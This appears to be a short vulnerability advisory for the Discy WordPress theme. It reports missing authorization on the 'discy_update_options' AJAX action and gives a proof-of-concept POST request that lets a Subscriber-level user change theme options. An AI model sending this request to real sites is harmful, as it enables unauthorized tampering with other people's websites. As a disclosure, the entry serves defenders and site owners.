The theme lacks authorization checks then processing ajax requests to the discy_update_options action, allowing any logged in users (with privileges as low as Subscriber,) to change the theme options by sending a crafted POST request.
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close Cookie: [subscriber+] action=discy_update_options&data=<changed settings>
Veshraj Ghimire
Veshraj Ghimire
Yes
2022-07-12 (about 6 months ago)
2022-07-12 (about 6 months ago)
2022-07-12 (about 6 months ago)